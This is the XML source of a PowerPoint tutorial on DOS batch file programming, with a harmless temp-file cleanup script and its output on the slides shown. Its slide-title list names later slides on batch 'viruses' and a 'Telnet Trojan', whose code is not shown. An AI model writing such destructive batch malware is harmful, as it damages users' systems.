              <a:t>prompt. E.g firefox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" cap="small" dirty="0" smtClean="0"/>
              <a:t>move, find, backup, undelete, format.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" cap="small" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="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28052" y="418196"/>
            <a:ext cx="1362379" cy="1362379"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="389375636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338009" y="2711898"/>
            <a:ext cx="5533310" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="6000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Why BATCH???</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="6000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRP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60403" y="1367779"/>
            <a:ext cx="3226222" cy="4328931"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="420217858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So why do I need Batch File Programs?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Say </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>you need to execute a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>set of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>commands over and over again to perform a routine task like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Backing up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Important Files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>, Deleting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>temporary files(*.tmp, .bak , ~.* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>etc) then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>it is very difficult to type the same set of commands over and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>over again</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>perform a bulk set of same commands over and over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>again, Batch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>files are used. Batch Files are to DOS what Macros are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>to Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Office and are used to perform an automated predefined </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>set of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>tasks over and over again.</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64856" y="982132"/>
            <a:ext cx="1063481" cy="1047750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282977358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IN" dirty="0" smtClean="0"/>
              <a:t>Lets take an example……</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>.BAT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>File</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" dirty="0">
              <a:latin typeface="ComicSansMS,Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="ComicSansMS,Bold"/>
              </a:rPr>
              <a:t>	ECHO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0">
                <a:latin typeface="ComicSansMS,Bold"/>
              </a:rPr>
              <a:t>This Batch File deletes all unwanted Temporary files from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="ComicSansMS,Bold"/>
              </a:rPr>
              <a:t>your system </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" dirty="0">
              <a:latin typeface="ComicSansMS,Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="ComicSansMS,Bold"/>
              </a:rPr>
              <a:t>	ECHO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0">
                <a:latin typeface="ComicSansMS,Bold"/>
              </a:rPr>
              <a:t>Now we go to the Windows\temp directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="ComicSansMS,Bold"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" dirty="0">
              <a:latin typeface="ComicSansMS,Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="ComicSansMS,Bold"/>
              </a:rPr>
              <a:t>	cd windows\temp</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" dirty="0">
              <a:latin typeface="ComicSansMS,Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="ComicSansMS,Bold"/>
              </a:rPr>
              <a:t>	ECHO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0">
                <a:latin typeface="ComicSansMS,Bold"/>
              </a:rPr>
              <a:t>Deleting unwanted temporary files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="ComicSansMS,Bold"/>
              </a:rPr>
              <a:t>....</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" dirty="0">
              <a:latin typeface="ComicSansMS,Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="ComicSansMS,Bold"/>
              </a:rPr>
              <a:t>	del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0">
                <a:latin typeface="ComicSansMS,Bold"/>
              </a:rPr>
              <a:t>*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="ComicSansMS,Bold"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" dirty="0">
              <a:latin typeface="ComicSansMS,Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="ComicSansMS,Bold"/>
              </a:rPr>
              <a:t>	ECHO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0">
                <a:latin typeface="ComicSansMS,Bold"/>
              </a:rPr>
              <a:t>Your System is Now Clean</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1600" b="1" dirty="0">
              <a:latin typeface="ComicSansMS,Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="16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26076" y="3414532"/>
            <a:ext cx="2870521" cy="2870521"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168286538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045029" y="1463864"/>
            <a:ext cx="9571512" cy="4708981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0"/>
              <a:t>Now let's see what happens when we execute the above snippet of batch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0"/>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" dirty="0" smtClean="0">
              <a:latin typeface="ComicSansMS,Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:\WINDOWS&gt;batch_file_name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\WINDOWS&gt;ECHO This Batch File deletes all unwanted Temporary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>files from your</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\WINDOWS&gt;ECHO Now we go to the Windows\temp directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Now we go to the Windows\temp directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\WINDOWS&gt;cd windows\temp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Invalid directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\WINDOWS&gt;ECHO Deleting unwanted temporary files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Deleting unwanted temporary files...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\WINDOWS&gt;del *.tmp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\WINDOWS&gt;ECHO Your System is Now Clean</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Your System is Now Clean</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045029" y="817533"/>
            <a:ext cx="2565446" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" dirty="0" smtClean="0"/>
              <a:t>Continue… </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" b="1"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98172" y="4572000"/>
            <a:ext cx="1718369" cy="1452803"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136912246"/>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B15E28"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="B13228"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="8B7B56"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="E09C41"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="9EAE51"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="6E7355"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="D37A21"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="CA8F55"/>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039A4B3-0617-4CFC-B614-27363ECC28AC}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Organic</Template>
  <TotalTime>2659</TotalTime>
  <Words>1552</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>288</Paragraphs>
  <Slides>39</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39</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="47" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Cambria Math</vt:lpstr>
      <vt:lpstr>ComicSansMS,Bold</vt:lpstr>
      <vt:lpstr>Constantia</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Garamond</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Organic</vt:lpstr>
      <vt:lpstr>  A START TO BATCH FILE  PROGRAMMING</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Modes that are supported by DOS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Types of commands that we can run from a command prompt</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>So why do I need Batch File Programs?</vt:lpstr>
      <vt:lpstr>Lets take an example……</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Basic Commands you should know</vt:lpstr>
      <vt:lpstr>Passing Parameters(%0 - %9)</vt:lpstr>
      <vt:lpstr>SHIFT command</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The FOR Loop</vt:lpstr>
      <vt:lpstr>Let’s take another example…..</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>IF: CONDITIONAL BRANCHING</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>NULL device</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Redirection Operators</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PIPING</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Many Folders</vt:lpstr>
      <vt:lpstr> Undeletable Folder with Your Name</vt:lpstr>
      <vt:lpstr>System Restart Virus</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>For loop viruses 1</vt:lpstr>
      <vt:lpstr>For loop viruses 2   (Damage level :High) </vt:lpstr>
      <vt:lpstr>For loop viruses 3   (Damage level :High)  </vt:lpstr>
      <vt:lpstr>Telnet Trojan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BATCH PROGRAMMING</dc:title>
  <dc:creator>Akshay Saini</dc:creator>
  <cp:lastModifiedBy>Akshay Saini</cp:lastModifiedBy>
  <cp:revision>97</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-01-26T09:26:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-04-17T14:44:35Z</dcterms:modified>
</cp:coreProperties>
</file>